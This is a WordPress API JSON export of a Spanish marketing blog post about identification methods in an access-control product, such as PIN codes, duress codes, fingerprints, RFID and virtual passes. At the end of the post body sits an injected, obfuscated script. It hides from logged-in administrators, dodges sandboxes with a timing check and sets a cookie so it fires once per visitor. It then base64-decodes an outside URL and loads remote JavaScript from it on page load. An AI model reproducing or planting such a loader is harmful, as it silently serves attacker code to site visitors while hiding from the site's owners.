{"id":8185,"date":"2018-10-11T10:36:41","date_gmt":"2018-10-11T13:36:41","guid":{"rendered":"http:\/\/wp.controlglobal.biz:8888\/controlglobal\/?p=8185"},"modified":"2025-11-04T15:24:47","modified_gmt":"2025-11-04T18:24:47","slug":"beneficios-access-id-personal","status":"publish","type":"post","link":"https:\/\/controlglobal.biz\/blog\/2018\/10\/11\/beneficios-access-id-personal\/","title":{"rendered":"Beneficios de Access Control: ID Personal"},"content":{"rendered":"<p>Otro de los beneficios de Access Control es la posibilidad de generar un ID personal para la identificaci\u00f3n de los accesos y el manejo del sistema. Las identificaciones personales a partir de ciertos par\u00e1metros determinados previamente son un recurso muy extendido y se constituyen como una garant\u00eda de seguridad en este tipo de sistemas. Lo novedoso de Access Control es que admite gran variedad de estos par\u00e1metros, para combinarlos seg\u00fan la conveniencia de los usuarios.<\/p>\n<p><a href=\"http:\/\/wp.controlglobal.biz:8888\/controlglobal\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter  wp-image-8186\" src=\"http:\/\/wp.controlglobal.biz:8888\/controlglobal\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-300x170.jpg\" alt=\"ID Personal\" width=\"321\" height=\"182\" srcset=\"https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-300x170.jpg 300w, https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-768x436.jpg 768w, https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-1030x585.jpg 1030w, https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-705x401.jpg 705w, https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2-450x256.jpg 450w, https:\/\/controlglobal.biz\/blog\/wp-content\/uploads\/2018\/10\/Recurso-1-100-2.jpg 1394w\" sizes=\"auto, (max-width: 321px) 100vw, 321px\" \/><\/a><\/p>\n<p>A trav\u00e9s de estos identificadores personales se pueden generar m\u00faltiples formas de acceso. Access control soporta una gran variedad, que pueden implementarse de formas variadas seg\u00fan las funcionalidades que se requieran. Entre ellas podemos mencionar:<\/p>\n<ul>\n<li>Ingreso con Pin y Password: una de las formas m\u00e1s seguras. El usuario ingresa colocando un usuario y una contrase\u00f1a \u00fanica en el teclado.<\/li>\n<li>Pin y Password para alerta: tambi\u00e9n llamado C\u00f3digo de Coacci\u00f3n, es una contrase\u00f1a especial que el usuario puede generar para introducir en el sistema en caso de intento de robo o situaci\u00f3n de violencia.<\/li>\n<li>Con la aplicaci\u00f3n de Access Control: una sencilla aplicaci\u00f3n que permite ingresar utilizando tecnolog\u00eda bluetooth o NFC<\/li>\n<li>Ingreso por la huella dactilar: a trav\u00e9s de la identificaci\u00f3n \u00fanica de la huella, se genera una m\u00e1xima seguridad en los accesos.<\/li>\n<li>Con tecnolog\u00eda RFID: vinculando alg\u00fan tag o etiqueta que tenga esta tecnolog\u00eda, se puede acceder de manera r\u00e1pida, sin necesidad de otro medio f\u00edsico.<\/li>\n<li>Con pases virtuales: los pases son permisos especiales de uso \u00fanico y personalizado. El usuario que crea los pases otorga permiso para utilizarlo en un determinado rango de tiempo, lo que asegura que su uso sea totalmente controlado.<\/li>\n<\/ul>\n<p>Finalmente, Access Control permite la creaci\u00f3n de llaveros virtuales. Los usuarios podr\u00e1n, en un mismo dispositivo, todas a disposici\u00f3n para su uso todas las llaves virtuales. Adem\u00e1s, podr\u00e1n monitorear y controlar los movimientos de las mismas desde su plataforma. De esta manera, es posible centralizar los usos y funciones de cada llaves en un s\u00f3lo lugar.<\/p>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Otro de los beneficios de Access Control es la posibilidad de generar un ID personal para la identificaci\u00f3n de los accesos y el manejo del sistema. Las identificaciones personales a partir de ciertos par\u00e1metros determinados previamente son un recurso muy extendido y se constituyen como una garant\u00eda de seguridad en este tipo de sistemas. Lo [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":8188,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[97],"tags":[],"class_list":["post-8185","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-control-de-accesos"],"_links":{"self":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8185","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/comments?post=8185"}],"version-history":[{"count":4,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8185\/revisions"}],"predecessor-version":[{"id":10975,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/posts\/8185\/revisions\/10975"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/media\/8188"}],"wp:attachment":[{"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/media?parent=8185"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/categories?post=8185"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/controlglobal.biz\/blog\/wp-json\/wp\/v2\/tags?post=8185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}